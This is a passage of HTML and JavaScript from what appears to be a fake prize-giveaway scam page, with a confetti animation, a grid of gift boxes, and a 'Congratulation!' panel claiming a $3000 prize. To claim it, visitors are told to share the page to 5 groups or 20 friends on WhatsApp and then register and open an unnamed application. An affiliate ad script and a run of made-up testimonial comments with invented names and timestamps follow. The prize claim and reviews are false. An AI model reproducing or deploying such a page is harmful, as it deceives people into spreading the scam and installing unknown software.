	                stopConfetti = stopConfettiInner;
	                toggleConfetti = toggleConfettiInner;
	                removeConfetti = removeConfettiInner;
	                var colors = ["DodgerBlue", "OliveDrab", "Gold", "Pink", "SlateBlue", "LightBlue", "Violet", "PaleGreen",
	                    "SteelBlue", "SandyBrown", "Chocolate", "Crimson"
	                ]
	                var streamingConfetti = false;
	                var animationTimer = null;
	                var particles = [];
	                var waveAngle = 0;
	                function resetParticle(particle, width, height) {
	                    particle.color = colors[(Math.random() * colors.length) | 0];
	                    particle.x = Math.random() * width;
	                    particle.y = Math.random() * height - height;
	                    particle.diameter = Math.random() * 10 + 5;
	                    particle.tilt = Math.random() * 10 - 10;
	                    particle.tiltAngleIncrement = Math.random() * 0.07 + 0.05;
	                    particle.tiltAngle = 0;
	                    return particle;
	                }
	                function startConfettiInner() {
	                    var width = window.innerWidth;
	                    var height = window.innerHeight;
	                    window.requestAnimFrame = (function() {
	                        return window.requestAnimationFrame || window.webkitRequestAnimationFrame || window
	                            .mozRequestAnimationFrame || window.oRequestAnimationFrame || window
	                            .msRequestAnimationFrame || function(callback) {
	                                return window.setTimeout(callback, 16.6666667);
	                            };
	                    })();
	                    var canvas = document.getElementById("confetti-canvas");
	                    if (canvas === null) {
	                        canvas = document.createElement("canvas");
	                        canvas.setAttribute("id", "confetti-canvas");
	                        canvas.setAttribute("style",
	                            "display:block;z-index:888888;pointer-events:none;position: absolute;left: 0px;top: 0px;");
	                        document.body.appendChild(canvas);
	                        canvas.width = width;
	                        canvas.height = height;
	                        window.addEventListener("resize", function() {
	                            canvas.width = window.innerWidth;
	                            canvas.height = window.innerHeight;
	                        }, true);
	                    }
	                    var context = canvas.getContext("2d");
	                    while (particles.length < maxParticleCount)
	                        particles.push(resetParticle({}, width, height));
	                    streamingConfetti = true;
	                    if (animationTimer === null) {
	                        (function runAnimation() {
	                            context.clearRect(0, 0, window.innerWidth, window.innerHeight);
	                            if (particles.length === 0)
	                                animationTimer = null;
	                            else {
	                                updateParticles();
	                                drawParticles(context);
	                                animationTimer = requestAnimFrame(runAnimation);
	                            }
	                        })();
	                    }
	                }
	                function stopConfettiInner() {
	                    streamingConfetti = false;
	                }
	                function removeConfettiInner() {
	                    stopConfetti();
	                    particles = [];
	                }
	                function toggleConfettiInner() {
	                    if (streamingConfetti)
	                        stopConfettiInner();
	                    else
	                        startConfettiInner();
	                }
	                function drawParticles(context) {
	                    var particle;
	                    var x;
	                    for (var i = 0; i < particles.length; i++) {
	                        particle = particles[i];
	                        context.beginPath();
	                        context.lineWidth = particle.diameter;
	                        context.strokeStyle = particle.color;
	                        x = particle.x + particle.tilt;
	                        context.moveTo(x + particle.diameter / 2, particle.y);
	                        context.lineTo(x, particle.y + particle.tilt + particle.diameter / 2);
	                        context.stroke();
	                    }
	                }
	                function updateParticles() {
	                    var width = window.innerWidth;
	                    var height = window.innerHeight;
	                    var particle;
	                    waveAngle += 0.01;
	                    for (var i = 0; i < particles.length; i++) {
	                        particle = particles[i];
	                        if (!streamingConfetti && particle.y < -15)
	                            particle.y = height + 100;
	                        else {
	                            particle.tiltAngle += particle.tiltAngleIncrement;
	                            particle.x += Math.sin(waveAngle);
	                            particle.y += (Math.cos(waveAngle) + particle.diameter + particleSpeed) * 0.5;
	                            particle.tilt = Math.sin(particle.tiltAngle) * 15;
	                        }
	                        if (particle.x > width + 20 || particle.x < -20 || particle.y > height) {
	                            if (streamingConfetti && particles.length <= maxParticleCount)
	                                resetParticle(particle, width, height);
	                            else {
	                                particles.splice(i, 1);
	                                i--;
	                            }
	                        }
	                    }
	                }
	            })();
            </script>
			<div id="boxes" class="boxes">
				<div class="div_img_gift">
					<img class="img_gift" src="-tgdyzabxuJ4/YKpjmQ_UJKI/AAAAAAAABfk/VqO0bIY6vq0EZ9BvCyHwfUT8owQt7dzWwCLcBGAsYHQ/s16000/United-States_outbox.png">
				</div>
				<div id="0" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="1" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="2" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="3" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="4" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="5" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="6" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="7" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="8" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="9" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="10" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
				<div id="11" class="try temblor">
					<div class="caja_tapa">
						<img src="-bdLuI9GL8eM/YR57T8kyxwI/AAAAAAAACmI/qVw1nEherJQKeYJ0L5lQRBDQ0k7KfJq9wCLcBGAsYHQ/s16000/box1.png">
					</div>
					<div class="caja_trasera">
						<img src="-81aOBRt9mqE/YR57UJcQOwI/AAAAAAAACmQ/IGQ2mqL0rcQyy2GD_pqxBEtBRq0Vcb0VACLcBGAsYHQ/s16000/box2.png">
					</div>
					<div class="caja_gift">
						<img src="-RC32duKA6Wo/YKpjmBkVOEI/AAAAAAAABfg/PraKjCk35xQl-wrsLztkUt-VUrh547z7wCLcBGAsYHQ/s16000/United-States_inbox.png">
					</div>
					<div class="caja">
						<img src="-g6kSFEHqGaw/YR57U23X-rI/AAAAAAAACmU/XLYIx1ONfH8OJhomm_y8gL5BlVoeCSACACLcBGAsYHQ/s16000/box3.png">
					</div>
				</div>
			</div>
		</div>
		<div class="main-content" id="content4" style="display: none">
			<div class="container share_page" style="padding: 0px">
				<div class="share_body share_page" style="width: 100%;">
					<div class="share_hd_text">Congratulation!</div>
					<div class="weui_dialog_img prize_img" style="text-align: center;margin: 20px 0;">
						<img src="-tgdyzabxuJ4/YKpjmQ_UJKI/AAAAAAAABfk/VqO0bIY6vq0EZ9BvCyHwfUT8owQt7dzWwCLcBGAsYHQ/s16000/United-States_outbox.png"
						 height="170px">
					</div>
					<div class="weui_dialog_text" style="color: #222222;">Your prize is: $ 3000  , Follow the instructions on the next page to claim your prize !</div>
					<div class="share_main">
						<div class="share_ing" style="margin: 0 15px;">
							<span style="color: #222222;">
								<br>
								1. Share with 5 groups/20 friends (click the &quot;Share&quot; icon below)
								<br>
								<br>
								2. Click &quot;Continue&quot; and claim your prize.
							</span>
							<div class="share_main_bt" onclick="shareBtn()" id="shareBtn">WhatsApp</div>
							<div style="text-align: center;color: #999999; font-size: 14px">Share it until the blue bar is full!</div>
							<div class="progress progress-striped active" style="margin: 10px 0; border-radius: 19px;">
								<div class="progress-bar progress-bar-success" style="width:0;background-color:#0876b9;" id="progressbar"></div>
							</div>
							<div class="share_main_bt" onclick="continueBtn()" style="margin: 20px auto 0; background-color: #1e5bc6;">
								Continue
							</div>
							<br>
						</div>
						<div class="share_success" style="margin: 0 15px;display: none">
							<span style="color: #222222;">
								<br>
								Congratulations! The last step:
								<br>
								<br>
								You must complete this final step!
								<br>
								<br>
								1. You must register the application below, and it must be opened for 30 seconds after registration.
								<br>
								<br>
								(Remember, this step is very important)
								<br>
								<br>
								2. After completing the above actions, please wait for admin to check it, the review will be completed within 24 hours.
								<br>
								<br>
							</span>
							<div class="share_main_bt" onclick="shareOkBtn()" id="shareOkBtn">Complete registration</div>
							<center><ins style="width: 300px;height:50px" data-width="300" data-height="50" class="lda1c750f07" data-domain="//benfly.net" data-affquery="/c39aadb942/da1c750f07/?placementName=default"><script src="js/responsive.js" async></script></ins></center>
                            <center><div id="banner_ad_share" style="width: 100%; overflow: hidden;text-align: center"><script type="text/javascript" src="bnr.php-section-General-pub-995577-format-300x50-ga-g.js"></script></div></center>
       						<br>
						</div>
					</div>
					<div class="weui_dialog_text" style="margin-top:-5px;line-height: 36px;color: #666666">
					</div>
				</div>
			</div>
		</div>
		<div class="main-content" style="margin-top: 10px">
			<div class="comments_face">
				<div class="comments">
					<p style="margin:0;padding:0;float:left;display:block;width:50%">
						<span style="color:#3b5998">Comment</span>
					</p>
					<p style="margin:0;padding:0;float:right;display:block;width:50%;color:#a8a7a7;text-align:right">
						10 / 183
					</p>
					<div style="clear:both">
					</div>
				</div>
				<div class='detail_block'>
					<div class='detail_left'><img src='-LiL_snakuo4/YHgCi2NDGXI/AAAAAAAAA-0/bMeMOXvCdLgZyaSl7yhUs-w_75R1PIJDgCLcBGAsYHQ/s16000/16.jpg'></div>
					<div class='detail_right'>
						<h3>
							<div class='comm_name'>Sallie Hull</div>
						</h3>
						<p>Can I receive today? Thank you</p> <span class='likebar'>
							<div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24' preserveAspectRatio='xMidYMid meet'
								 focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M1 21h4V9H1v12zm22-11c0-1.1-.9-2-2-2h-6.31l.95-4.57.03-.32c0-.41-.17-.79-.44-1.06L14.17 1 7.59 7.59C7.22 7.95 7 8.45 7 9v10c0 1.1.9 2 2 2h9c.83 0 1.54-.5 1.84-1.22l3.02-7.05c.09-.23.14-.47.14-.73v-1.91l-.01-.01L23 10z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24'
								 preserveAspectRatio='xMidYMid meet' focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M15 3H6c-.83 0-1.54.5-1.84 1.22l-3.02 7.05c-.09.23-.14.47-.14.73v1.91l.01.01L1 14c0 1.1.9 2 2 2h6.31l-.95 4.57-.03.32c0 .41.17.79.44 1.06L9.83 23l6.59-6.59c.36-.36.58-.86.58-1.41V5c0-1.1-.9-2-2-2zm4 0v12h4V3h-4z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <span>2 minutes ago</span>
						</span>
					</div>
				</div>
				<div class='detail_block'>
					<div class='detail_left'><img src='-SAqw3PKqHD8/YHgCkGAfvjI/AAAAAAAAA_c/p2EEZo_ajF4bO2orKXctb3etvZKFRoYbQCLcBGAsYHQ/s16000/23.jpg'></div>
					<div class='detail_right'>
						<h3>
							<div class='comm_name'>Marvin Allen</div>
						</h3>
						<p>Fantastic! I have never won anything before!</p> <span class='likebar'>
							<div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24' preserveAspectRatio='xMidYMid meet'
								 focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M1 21h4V9H1v12zm22-11c0-1.1-.9-2-2-2h-6.31l.95-4.57.03-.32c0-.41-.17-.79-.44-1.06L14.17 1 7.59 7.59C7.22 7.95 7 8.45 7 9v10c0 1.1.9 2 2 2h9c.83 0 1.54-.5 1.84-1.22l3.02-7.05c.09-.23.14-.47.14-.73v-1.91l-.01-.01L23 10z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24'
								 preserveAspectRatio='xMidYMid meet' focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M15 3H6c-.83 0-1.54.5-1.84 1.22l-3.02 7.05c-.09.23-.14.47-.14.73v1.91l.01.01L1 14c0 1.1.9 2 2 2h6.31l-.95 4.57-.03.32c0 .41.17.79.44 1.06L9.83 23l6.59-6.59c.36-.36.58-.86.58-1.41V5c0-1.1-.9-2-2-2zm4 0v12h4V3h-4z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <span>8 minutes ago</span>
						</span>
					</div>
				</div>
				<div class='detail_block'>
					<div class='detail_left'><img src='-cEQjEi8C5dY/YHgCkuTDirI/AAAAAAAAA_o/4bq6UFuIrOIGY9bqpgiP-fe_CqTZZ9I_ACLcBGAsYHQ/s16000/27.jpg'></div>
					<div class='detail_right'>
						<h3>
							<div class='comm_name'>Casey Daniels</div>
						</h3>
						<p>I thought it was a joke, but arrived this morning!</p> <span class='likebar'>
							<div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24' preserveAspectRatio='xMidYMid meet'
								 focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M1 21h4V9H1v12zm22-11c0-1.1-.9-2-2-2h-6.31l.95-4.57.03-.32c0-.41-.17-.79-.44-1.06L14.17 1 7.59 7.59C7.22 7.95 7 8.45 7 9v10c0 1.1.9 2 2 2h9c.83 0 1.54-.5 1.84-1.22l3.02-7.05c.09-.23.14-.47.14-.73v-1.91l-.01-.01L23 10z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24'
								 preserveAspectRatio='xMidYMid meet' focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M15 3H6c-.83 0-1.54.5-1.84 1.22l-3.02 7.05c-.09.23-.14.47-.14.73v1.91l.01.01L1 14c0 1.1.9 2 2 2h6.31l-.95 4.57-.03.32c0 .41.17.79.44 1.06L9.83 23l6.59-6.59c.36-.36.58-.86.58-1.41V5c0-1.1-.9-2-2-2zm4 0v12h4V3h-4z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <span>15 minutes ago</span>
						</span>
					</div>
				</div>
				<div class='detail_block'>
					<div class='detail_left'><img src='-3Udp08-V3Jk/YHgCmhA8QbI/AAAAAAAABAU/DpPJ6OH-IvgUU8uLp1mCFBaTu9erGq1ngCLcBGAsYHQ/s16000/37.jpg'></div>
					<div class='detail_right'>
						<h3>
							<div class='comm_name'>Walter Hoffman</div>
						</h3>
						<p>I participated, I won and I received after 5 days. Thank you so much guys!</p> <span class='likebar'>
							<div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24' preserveAspectRatio='xMidYMid meet'
								 focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M1 21h4V9H1v12zm22-11c0-1.1-.9-2-2-2h-6.31l.95-4.57.03-.32c0-.41-.17-.79-.44-1.06L14.17 1 7.59 7.59C7.22 7.95 7 8.45 7 9v10c0 1.1.9 2 2 2h9c.83 0 1.54-.5 1.84-1.22l3.02-7.05c.09-.23.14-.47.14-.73v-1.91l-.01-.01L23 10z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24'
								 preserveAspectRatio='xMidYMid meet' focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M15 3H6c-.83 0-1.54.5-1.84 1.22l-3.02 7.05c-.09.23-.14.47-.14.73v1.91l.01.01L1 14c0 1.1.9 2 2 2h6.31l-.95 4.57-.03.32c0 .41.17.79.44 1.06L9.83 23l6.59-6.59c.36-.36.58-.86.58-1.41V5c0-1.1-.9-2-2-2zm4 0v12h4V3h-4z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <span>19 minutes ago</span>
						</span>
					</div>
				</div>
				<div class='detail_block'>
					<div class='detail_left'><img src='-MMfkWQscwu8/YHgClhb8W-I/AAAAAAAAA_8/R9Dwskp0oeo3fxUWxdY6_To_ytfyqnIxgCLcBGAsYHQ/s16000/30.jpg'></div>
					<div class='detail_right'>
						<h3>
							<div class='comm_name'>Hugo Montgomery</div>
						</h3>
						<p>I like these promotions!</p> <span class='likebar'>
							<div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24' preserveAspectRatio='xMidYMid meet'
								 focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M1 21h4V9H1v12zm22-11c0-1.1-.9-2-2-2h-6.31l.95-4.57.03-.32c0-.41-.17-.79-.44-1.06L14.17 1 7.59 7.59C7.22 7.95 7 8.45 7 9v10c0 1.1.9 2 2 2h9c.83 0 1.54-.5 1.84-1.22l3.02-7.05c.09-.23.14-.47.14-.73v-1.91l-.01-.01L23 10z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24'
								 preserveAspectRatio='xMidYMid meet' focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M15 3H6c-.83 0-1.54.5-1.84 1.22l-3.02 7.05c-.09.23-.14.47-.14.73v1.91l.01.01L1 14c0 1.1.9 2 2 2h6.31l-.95 4.57-.03.32c0 .41.17.79.44 1.06L9.83 23l6.59-6.59c.36-.36.58-.86.58-1.41V5c0-1.1-.9-2-2-2zm4 0v12h4V3h-4z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <span>21 minutes ago</span>
						</span>
					</div>
				</div>
				<div class='detail_block'>
					<div class='detail_left'><img src='-p1ChveCU69o/YHayWUEVcuI/AAAAAAAAA6Q/tdTo5J-EY-ATfKBk4FbncNEVWQWgLjS1ACLcBGAsYHQ/s16000/18.jpg'></div>
					<div class='detail_right'>
						<h3>
							<div class='comm_name'>Remi Peltier</div>
						</h3>
						<p>I thought it was a joke, but I received my gift this morning and hope to investigate more!</p> <span class='likebar'>
							<div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24' preserveAspectRatio='xMidYMid meet'
								 focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M1 21h4V9H1v12zm22-11c0-1.1-.9-2-2-2h-6.31l.95-4.57.03-.32c0-.41-.17-.79-.44-1.06L14.17 1 7.59 7.59C7.22 7.95 7 8.45 7 9v10c0 1.1.9 2 2 2h9c.83 0 1.54-.5 1.84-1.22l3.02-7.05c.09-.23.14-.47.14-.73v-1.91l-.01-.01L23 10z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24'
								 preserveAspectRatio='xMidYMid meet' focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M15 3H6c-.83 0-1.54.5-1.84 1.22l-3.02 7.05c-.09.23-.14.47-.14.73v1.91l.01.01L1 14c0 1.1.9 2 2 2h6.31l-.95 4.57-.03.32c0 .41.17.79.44 1.06L9.83 23l6.59-6.59c.36-.36.58-.86.58-1.41V5c0-1.1-.9-2-2-2zm4 0v12h4V3h-4z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <span>27 minutes ago</span>
						</span>
					</div>
				</div>
				<div class='detail_block'>
					<div class='detail_left'><img src='--mmji97XnyY/YHgCiXjljfI/AAAAAAAAA-s/AwAAJ3WnPzc7YyEUKwMQPhnna3cX58JiQCLcBGAsYHQ/s16000/14.jpg'></div>
					<div class='detail_right'>
						<h3>
							<div class='comm_name'>Stephane Loupe</div>
						</h3>
						<p>Are there any other surveys to take?</p>
						<span class='likebar'>
							<div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24' preserveAspectRatio='xMidYMid meet'
								 focusable='false' class='style-scope yt-icon' style='pointer-events: none; display: block; width: 4vw; height: 6vw;'>
									<g class='style-scope yt-icon'>
										<path d='M1 21h4V9H1v12zm22-11c0-1.1-.9-2-2-2h-6.31l.95-4.57.03-.32c0-.41-.17-.79-.44-1.06L14.17 1 7.59 7.59C7.22 7.95 7 8.45 7 9v10c0 1.1.9 2 2 2h9c.83 0 1.54-.5 1.84-1.22l3.02-7.05c.09-.23.14-.47.14-.73v-1.91l-.01-.01L23 10z'
										 class='style-scope yt-icon'></path>
									</g>
								</svg></div>&nbsp; <div class='fbblue smaller' href='javascript:void(0);'><svg viewBox='0 0 24 24'
